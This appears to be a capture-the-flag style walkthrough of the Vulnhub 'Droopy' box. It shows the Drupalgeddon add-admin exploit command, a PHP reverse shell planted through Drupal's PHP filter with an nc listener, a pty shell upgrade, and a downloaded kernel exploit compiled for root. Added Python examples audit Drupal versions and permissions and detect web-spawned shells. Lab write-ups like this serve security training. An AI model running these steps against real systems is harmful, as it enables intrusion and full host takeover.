Yet again today we're working on another OSCP-like box, Droopy on Vulnhub. You can grab a copy here: Download Droopy: v0.2
We always start with an nmap scan...
nmap -sC -sV -oA nmap <Target-IP>
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy]
└─$ nmap -sC -sV -oA nmap 172.16.139.175
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 10:01 EDT
Nmap scan report for 172.16.139.175
Host is up (0.00013s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds
Just a single port, cool, and a robots.txt. Let's check the webpage to see what is running.
The CMS is Drupal. Let's check the robots.txt.
So I decided to check the /CHANGELOG.txt file, since it always holds the Drupal version. Let's confirm it.
And we have the version, 7.30. Let's do a quick searchsploit on it.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy]
└─$ searchsploit Drupal 7.30
-------------------------------------------------------------------------------------------------------- ----------------------
 Exploit Title                                                                                          | Path
-------------------------------------------------------------------------------------------------------- ----------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                      | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                       | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                            | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                            | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                               | php/webapps/35150.php
Drupal < 7.34 - Denial of Service                                                                      | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                               | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                            | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                    | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                       | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)  | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                         | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                     | php/webapps/46459.py
-------------------------------------------------------------------------------------------------------- ----------------------
Shellcodes: No Results
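The CHANGELOG.txt check and the searchsploit listing are really one version-triage step: read the installed version, compare it with the fixed-in bounds of each advisory. Here is an added Python example (not part of the original walkthrough) that pulls the newest version line out of a constructed CHANGELOG.txt excerpt and reports which of the listed advisories apply. The changelog text and the short advisory names are my own constructions; the version bounds are the ones in the searchsploit output above, and the same function can be pointed at the live file a site serves.

```python
import re

# Constructed excerpt of a Drupal 7 CHANGELOG.txt. The real file lists the
# newest release first as "Drupal <version>, <date>", which is what we parse.
SAMPLE_CHANGELOG = """\
Drupal 7.30, 2014-07-24
-----------------------
- Fixed security issues (denial of service). See SA-CORE-2014-004.
- Numerous bug fixes.

Drupal 7.29, 2014-07-16
-----------------------
- Fixed security issues (multiple vulnerabilities). See SA-CORE-2014-003.
"""

# Upper bounds copied from the searchsploit listing above: a site running a
# version *below* the bound is affected. The short names are my own labels.
ADVISORIES = [
    ("Drupalgeddon SQL injection", (7, 31)),
    ("Denial of service", (7, 34)),
    ("Drupalgeddon3 (authenticated RCE)", (7, 58)),
    ("Drupalgeddon2 RCE", (7, 58)),
]

# First "Drupal X.Y" (optionally X.Y.Z) at the start of a line.
VERSION_RE = re.compile(r"^Drupal (\d+)\.(\d+)(?:\.(\d+))?", re.MULTILINE)


def drupal_version(changelog_text):
    """Return the newest version in the changelog as (major, minor), or None."""
    m = VERSION_RE.search(changelog_text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)))


def applicable_advisories(version, advisories=ADVISORIES):
    """Names of advisories whose fixed-in bound lies above the running version."""
    return [name for name, fixed_in in advisories if version < fixed_in]


if __name__ == "__main__":
    found = drupal_version(SAMPLE_CHANGELOG)
    print("Detected Drupal " + ".".join(str(n) for n in found))
    for name in applicable_advisories(found):
        print(" - affected by:", name)
```

For a live site the same comparison is what patch management should be doing before an attacker does it: anything below 7.31 on this list is hit by every entry, which is why CHANGELOG.txt is worth removing or blocking from the web root even after patching.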
And boom, we have some exploits. Let's try the first one, since it adds a new admin user. Sounds cool, right?
python 34992.py -t http://172.16.139.175/ -u muzec -p muzec
And the user is created. Let's use it to log in.
Ahhhhh, we are in. Awesome, right?? lol. Now let's try to get a reverse shell, but first some settings.
Click on Modules, scroll down, tick PHP filter and click Save.
Now go back to the same Modules page and click on Permissions next to the PHP filter.
Scroll down, tick "Use the PHP code text format" and save the permissions.
Now click on Add content.
Click on Article.
In the title, name it shell, skip the tags and move to the body. We need a PHP reverse shell from pentestmonkey, which you can download here: Download PHP Reverse Shell.
Copy the reverse shell code into the body, making sure to set our local IP address and port, and start an Ncat listener.
At Text format, pick PHP code.
Click Save. Going back to our listener, we should have a shell.
And boom, we have a shell.
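From the defender's side, the steps above are exactly the configuration that turns a Drupal admin login into code execution: the PHP filter module switched on plus a role holding the "Use the PHP code text format" permission. The following Python is an added audit example, not code from the walkthrough or from Drupal itself. It rebuilds minimal stand-ins for the Drupal 7 system, role and role_permission tables in an in-memory SQLite database (the column names and the permission machine name use text format php_code are from memory of the Drupal 7 schema and should be checked against a real database) and reports whether the module is enabled and which roles can use the PHP code format.

```python
import sqlite3

# Minimal stand-ins for three Drupal 7 tables (assumed column names; the
# real tables carry more columns than needed here).
SCHEMA = """
CREATE TABLE system (filename TEXT, name TEXT, type TEXT, status INTEGER);
CREATE TABLE role (rid INTEGER, name TEXT);
CREATE TABLE role_permission (rid INTEGER, permission TEXT, module TEXT);
"""

# Constructed state matching the steps above: PHP filter enabled and the
# PHP code text format granted to the administrator role.
AFTER_WALKTHROUGH = """
INSERT INTO system VALUES ('modules/php/php.module', 'php', 'module', 1);
INSERT INTO system VALUES ('modules/node/node.module', 'node', 'module', 1);
INSERT INTO role VALUES (1, 'anonymous user');
INSERT INTO role VALUES (2, 'authenticated user');
INSERT INTO role VALUES (3, 'administrator');
INSERT INTO role_permission VALUES (3, 'administer modules', 'system');
INSERT INTO role_permission VALUES (3, 'use text format php_code', 'filter');
"""

# Assumed machine name behind the UI label "Use the PHP code text format".
PHP_FORMAT_PERMISSION = "use text format php_code"


def load(fixture_sql):
    """Create an in-memory database holding the constructed tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA + fixture_sql)
    return conn


def audit_php_filter(conn):
    """Report whether the php module is enabled and who may use its text format."""
    row = conn.execute(
        "SELECT status FROM system WHERE name = 'php' AND type = 'module'"
    ).fetchone()
    roles = [
        name
        for (name,) in conn.execute(
            "SELECT r.name FROM role_permission rp "
            "JOIN role r ON r.rid = rp.rid "
            "WHERE rp.permission = ? ORDER BY r.rid",
            (PHP_FORMAT_PERMISSION,),
        )
    ]
    return {"php_filter_enabled": bool(row and row[0]), "roles_with_php_code": roles}


def harden(conn):
    """Illustrative remediation on the stand-in tables: drop the permission
    from every role and mark the module disabled. On a real site do this
    through the admin UI or drush so Drupal's caches and hooks run."""
    conn.execute("DELETE FROM role_permission WHERE permission = ?", (PHP_FORMAT_PERMISSION,))
    conn.execute("UPDATE system SET status = 0 WHERE name = 'php' AND type = 'module'")
    conn.commit()


if __name__ == "__main__":
    db = load(AFTER_WALKTHROUGH)
    print("before:", audit_php_filter(db))
    harden(db)
    print("after: ", audit_php_filter(db))
```

Any non-empty roles_with_php_code is a finding even when the role is administrator: an admin account obtained through a bug like the one used above becomes a shell the moment the format is available, so the module is best left disabled and the permission granted to no role.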
Now let's spawn a TTY shell.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy]
└─$ nc -nvlp 5555
listening on [any] 5555 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.4] 55347
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
18:37:44 up 40 min, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn ("/bin/bash")'
www-data@droopy:/$
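A shell that arrives this way shows up on the host as sh, python and bash processes whose ancestry leads back to apache2 running as www-data, which is a simple thing to hunt for. The following Python is an added detection example, not part of the original post: it parses a constructed ps -eo pid,ppid,user,comm listing that mimics the state after the reverse shell and TTY spawn above and flags every shell or interpreter with a web server process among its ancestors. The process names, PIDs and the interpreter and web-server lists are my own assumptions.

```python
# Constructed `ps -eo pid,ppid,user,comm` output: a sh -> python -> bash chain
# under an apache2 worker (the reverse shell plus pty.spawn), and a legitimate
# interactive bash under sshd for comparison.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     init
  812     1 root     apache2
  901   812 www-data apache2
  902   812 www-data apache2
 1410   902 www-data sh
 1411  1410 www-data python
 1412  1411 www-data bash
 1500     1 root     sshd
 1601  1500 gsuser   bash
"""

# Assumed lists: what a web server should never be the ancestor of, and which
# process names count as the web server tier.
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "nc", "ncat"}
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}


def parse_ps(text):
    """Map pid -> {ppid, user, comm} from a pid,ppid,user,comm listing."""
    procs = {}
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, ppid, user, comm = parts
        procs[int(pid)] = {"ppid": int(ppid), "user": user, "comm": comm}
    return procs


def ancestry(procs, pid):
    """PIDs from the process up to the root of the tree (cycle-safe)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain


def web_spawned_shells(procs):
    """Return (pid, user, chain) for every shell/interpreter under a web server."""
    findings = []
    for pid, proc in sorted(procs.items()):
        if proc["comm"] not in SHELLS:
            continue
        chain = ancestry(procs, pid)
        if any(procs[a]["comm"] in WEB_SERVERS for a in chain[1:]):
            desc = " > ".join(f"{procs[a]['comm']}({a})" for a in reversed(chain))
            findings.append((pid, proc["user"], desc))
    return findings


if __name__ == "__main__":
    for pid, user, chain in web_spawned_shells(parse_ps(SAMPLE_PS)):
        print(f"suspicious pid {pid} ({user}): {chain}")
```

The same walk works over auditd execve records or an EDR process tree; the signal is the ancestry, not the name, so a renamed binary still trips it as long as the parent chain is intact. The gsuser bash under sshd is not reported, which is the false-positive case the ancestor check exists for.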
Checking the home directory, I found a user but nothing interesting about it.
www-data@droopy:/home/gsuser$ ls
ls
drupal
www-data@droopy:/home/gsuser$ ls -la
ls -la
total 32
drwxr-xr-x 4 gsuser gsuser 4096 Apr 10 2016 .
drwxr-xr-x 3 root root 4096 Dec 11 2014 ..
-rw-r--r-- 1 gsuser gsuser 220 Dec 11 2014 .bash_logout
-rw-r--r-- 1 gsuser gsuser 3637 Dec 11 2014 .bashrc
drwx------ 2 gsuser gsuser 4096 Dec 11 2014 .cache
-rw-r--r-- 1 gsuser gsuser 675 Dec 11 2014 .profile
-rw------- 1 root root 1463 Dec 11 2014 .viminfo
drwxrwxr-x 2 gsuser gsuser 4096 Apr 11 2016 drupal
www-data@droopy:/home/gsuser$
Privilege Escalation
Looking around I found credentials for MySQL, but nothing interesting in the databases, so I decided to check the kernel version.
uname -a
A quick Google search and we found our exploit. Not sure about it, but let's give it a try.
Now let's transfer it to the target with SimpleHTTPServer and wget.
Now let's compile the exploit.
gcc 37292.c -o exploit
Now let's run it.
Boom, we are root.
Greetings From Muzec